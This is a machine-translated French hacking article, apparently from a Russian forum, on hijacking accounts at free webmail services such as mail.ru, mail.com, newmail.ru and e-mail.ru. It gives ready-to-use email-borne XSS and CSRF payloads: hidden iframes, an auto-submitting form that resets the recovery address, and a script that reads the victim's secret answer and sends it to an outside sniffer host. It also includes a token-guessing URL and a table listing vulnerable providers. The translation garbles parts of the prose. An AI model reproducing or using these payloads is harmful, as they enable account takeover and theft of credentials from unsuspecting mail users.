This page has been robot translated, sorry for typos if any. Original content here.

EXAMEN DE LA VULNÉRABILITÉ DES SERVICES POSTAUX GRATUITS

Nous continuons à traiter le courrier électronique. J'ai effectué une petite étude de divers services pour le piratage et présente à votre attention les résultats. La technologie de l'attaque reste la même: un e-mail avec un code JavaScript envoyé à l'adresse de quelqu'un d'autre est envoyé, ce qui fonctionne lorsque le message est ouvert, et modifie certaines informations dans les paramètres de la boîte utilisateur. Il est inutile de décrire chaque serveur en détail, car l'approche est la même partout, donc je vais donner quelques exemples, et à la fin - une table. Dans la plupart des cas, le piratage peut être considéré comme 100%, avec certaines hypothèses: l'utilisateur doit utiliser l'interface web pour lire les lettres, je suis guidé par une plate-forme standard, je suppose que l'utilisateur n'a pas de système d'exploitation exotique ou navigateur avec l'exécution JS désactivée.

WWW.MAIL.RU

Je vais commencer par le numéro 1 en Russie. À l'heure actuelle, en sautant de JavaScript et une erreur de développeur, casser cette boîte peut être fait. Je crois que les principes de base sont bien connus. Comment obtenir un mot de passe? 1 - pour le changer non autorisé. Ne pas passer, vous devez connaître le précédemment établi. 2 - pour changer la question secrète et utiliser le service pour combattre l'amnésie. Aussi ne fonctionnera pas. 3 - configurez votre Email alternatif pour obtenir le nouveau mot de passe généré par le système. Cela ne fonctionne pas, les deux dernières options listées ci-dessus sont sous la même forme et sont également protégées par un mot de passe. Même le reste, représentant pour nous moins de paramètres d'intérêt (Nom, Prénom, etc.) maintenant sans entrer le mot de passe actuel ne pourra pas changer. Il semblerait qu'il n'y ait pas d'options. Cependant, il y a une section secondaire, discrète, des paramètres «Coordonnées» (ICQ, site Web, téléphone, lieu de travail, fuseau horaire, etc.). Dans cette section, vous pouvez également spécifier un e-mail de contact. L'astuce est que dans le même temps dans les informations d'enregistrement l'adresse alternative change mais celle qui est enregistrée dans le questionnaire, et maintenant vous pouvez obtenir un mot de passe pour le savon en utilisant le service de rappel. C'est simple. URL: http://win.mail.ru/cgi-bin/anketa?page=2&Email=hacker@antichat.ru vérité de la méthode GET est que les paramètres de la boîte mail.ru ne peuvent pas être changés maintenant, donc je vais décrire en détail le côté technique de la question.

I. Nous envoyons à la case désirée une lettre avec un code qui va générer un cadre directement dans le corps du message avec un lien vers notre site. Si possible, le script devrait fonctionner sans aucune intervention de l'utilisateur (clic, clic, survol de la souris, téléchargement d'image, etc.):


 <embed src = "javascript: document.getElementById ('xxx'). innerHTML = '<iframe src = http: //votresite.votredomaine.com/yourscript.html> </ iframe>'; this.wav">
 <p id = 'xxx'>
Afin d'assurer complètement la fonctionnalité du script, ainsi que le déguisement, nous convertissons:
 <embed src = "javascript: état = emplacement; document.getElementById ('xxx'). innerHTML = 'iframe src = http: //votresite.com/yourscript.html width = 0 height = 0> </ iframe>' ; this.wav "largeur = 0 hauteur = 0>
 <p id = 'xxx'>
Dans cette forme, les codes de caractères remplacent les lettres dans les noms des éléments javascript et iframe, et le script de messagerie ne les filtre pas. L'état = ligne de localisation; Crée la visibilité de l'URL locale dans la barre d'état afin qu'aucun scintillement extérieur n'éveille de suspicion. Les attributs width et height du cadre et de l'embed sont mis à zéro et les rendent invisibles.

II. Sur la ressource http://yoursite.ru nous avons un document HTML avec un formulaire pour envoyer les données modifiées au serveur mail.ru.

Le contenu de yourscript.html:
 <form method = "post" action = "http://win.mail.ru/cgi-bin/anketa" name = "anketa"> <br>
 <input type = "hidden" name = "page" value = "2"> <br>
 <input type = "hidden" name = "Email" valeur = "hacker@antichat.ru"> <br>
 <input type = "hidden" value = "Enregistrer" name = "Enregistrer"> <br>
 </ form> <br>
 <script> <br>
 document.anketa.submit (); <br>
 </ script>
Notes: le travail de la partie client du script sous une forme inchangée est garanti uniquement pour IE; Le formulaire d'envoi est posté sur un site distinct spécifiquement pour "décharger" la lettre.


WWW.MAIL.COM

Maintenant, une erreur de sécurité légèrement différente, par exemple http://mail.com. Si vous utilisez le service de rappel de mot de passe, alors pour l'obtenir, il vous suffit d'entrer la bonne réponse à la question secrète (l'une des options). Nous nous sommes donc fixé la tâche d'obtenir cette réponse. Ceci est fait facilement. Quand je suis allé dans les propriétés de la boîte aux lettres et que j'ai regardé les informations d'enregistrement, j'ai vu que la réponse à la question secrète n'est pas cachée, ce qui nous permet d'utiliser JavaScript pour interpréter sa valeur.

Nous implémentons le script via la balise de style .
Adresse de la page avec les paramètres: http://mail01.mail.com/scripts/common/genprofile.cgi
Nom du formulaire: profileform
Le nom du champ de texte avec une réponse secrète: hint_a
En fin de compte, pour voler une question secrète, vous devez appeler la page des paramètres, exécuter JavaScript, obtenir la valeur de document.profileform.hint_a.value, et la passer au renifleur avec la variable d'environnement REQUEST_UR I.

Version prête à l'emploi:
 <style> @import url (javascript: document.getElementById ('out'). innerHTML = "<iframe src = http: //mail01.mail.com/scripts/common/genprofile.cgi nom = 'zéro'% 6FnLoad = `str = document.zero.profileform.hint_a.value; path = 'http: //zero.h12.ru/stat/capt.php?'; document.zero.location = chemin + str`> </ iframe>" ); </ style>
 <span id = 'out'> </ span>
Dans le cadre généré avec le nom zéro, la page des paramètres est chargée. A la fin du téléchargement, le gestionnaire OnLoad lance le script de lecture de la question secrète, puis, via ce même cadre, envoie une réponse au renifleur. Maintenant, il suffit d'aller à http://zero.h12.ru/stat/log.php, et de trouver les informations nécessaires dans la ligne "Host" .

WWW.NEWMAIL.RU

À mon avis, un facteur assez populaire, je vais vous en parler en détail. De plus, il est beaucoup plus facile de prendre possession du compte d'autrui qu'il n'y paraît à première vue. Vous pouvez le faire: envoyez un message avec un script qui recevra l' ID de session au démarrage, générez les requêtes nécessaires et modifiez les paramètres de l'email altrenratif (auquel le mot de passe est ensuite envoyé) et la question secrète et la réponse. Cependant, si vous spécifiez une autre adresse avec un rappel, le mot de passe lui sera envoyé, à condition que la réponse secrète soit correcte. Et l'observation suivante: ID de session pour modifier les paramètres ne peut pas être utilisé du tout. De plus, tous les tags sont autorisés. Tout ce qui précède réduit la quantité de code à quelques lignes:
 <iframe src = http: //newmail.ru/users/chpass.dhtml? cp_msg = 1 & cp_quest = QUESTION & cp_answ = RÉPONSE width = 0 height = 0> </ iframe> 

WWW.E-MAIL.RU

La méthode de piratage e-mail.ru ne rentre pas dans le thème général de l'article, mais toujours - mail :) . Quand j'ai eu besoin d'un mot de passe d'une boîte, j'ai enregistré mon compte comme d'habitude et j'ai commencé à enquêter sur le système. La première chose qui a attiré mon attention était la possibilité de définir un nouveau mot de passe et une question secrète avec une réponse, sans entrer l'ancien mot de passe. Le plan d'action habituel consiste à vérifier le filtrage des tags, à obtenir l'ID et à exécuter la requête. Toutefois, pour modifier les paramètres utilisés une variable spéciale utoken, qui est contenue dans le corps du document. Après avoir expérimenté le changement de la question et la réponse avec l'utoken précédemment connu:
http://www.e-mail.ru/scripts/netauth.dll?cmd=passwd2&show=passwd.tpl&utoken=email@e-mail.ru-5a00&show=passwd.tpl&pass=&repass=&pquestion=ВОПРОС&panswer=ОТВЕТ Je suis venu à la conclusion que l' identification et les cookies pour changer les paramètres ne sont pas nécessaires. Dans ce cas, après la surveillance d'utoken, il a été constaté que le nombre hexadécimal à quatre chiffres après l'adresse e-mail email@e-mail.ru-5a00 se situe dans une fourchette très étroite. A savoir, pour établir une question secrète avec la réponse sur n'importe quelle case qui nous intéresse, vous devez passer par seulement 7 options: 5a00 , 5b00 , 5c00 , 5d00 , 5e00 , 5f00 , 6000 . Quand le nombre est deviné, nous entrerons dans la case désirée.

Notes: il y a eu quelques changements en ce moment. Le service de récupération de mot de passe ne fonctionne pas, il est donc conseillé de le changer immédiatement. L'adresse du changement de configuration a également changé:
http://www.e-mail.ru/scripts/netauth.dll?cmd=passwd2&show=passwd.tpl&utoken=email@e-mail.ru-5a00&u_token=email@e-mail.ru-5c00&show=passwd.tpl&pass=&repass=&pquestion=ВОПРОС&panswer=ОТВЕТ La méthode ne fonctionne pas pour toujours. Probablement, tout de même, il est nécessaire que l'utilisateur de temps en temps aller dans le courrier via le web .

Tableau avec les caractéristiques des serveurs WWW gratuits

SERVEUR JavaScript VULNÉRABILITÉ
www.km.ru
km.ru
img src = javascript: Vous permet de lire le mot de passe à partir de la page des paramètres du champ Mot de passe
www.mail.ru
inbox.ru , bk.ru , list.ru ,
embed src = javascript: Vous pouvez modifier un autre e-mail
www.mail.com
email.com , post.com , myself.com , consultant.com et autres.
@ import url (javascript :); Les paramètres montrent la réponse à la question de sécurité
www.newmail.ru
nm.ru , hotmail.ru , orc.ru , nightmail.ru
En aucune façon Lisez / modifiez la question et la réponse. Le mot de passe est valide
www.netman.ru et www.mailgate.ru
le même facteur. environ 80 domaines
img src = javascript :, style = fond: url (javascript :) Vous pouvez voler une réponse à une question secrète, si elle est installée. Il est également possible de définir l'adresse pour le transfert (les copies ne sont pas sauvegardées)
www.yandex.ru OnError, OnLoad Suppression du site * .narod.ru (JS n'est pas requis)
www.ukr.net embed src = javasc
ript: ce .wav>
Lisez la réponse à votre question de sécurité
www.nextmail.ru
xaker.ru , email.su , russe.ru , students.ru , programist.ru , designer.ru , mail2k.ru ,
embed src = "javascript: Changer / voler la réponse à votre question de sécurité
www.hotbox.ru
pochta.ru , pisem.net , fromru.com , land.ru , et d'autres.
De plusieurs façons Supprimer un compte
www.rin.ru embed src = javascript: Lire la réponse secrète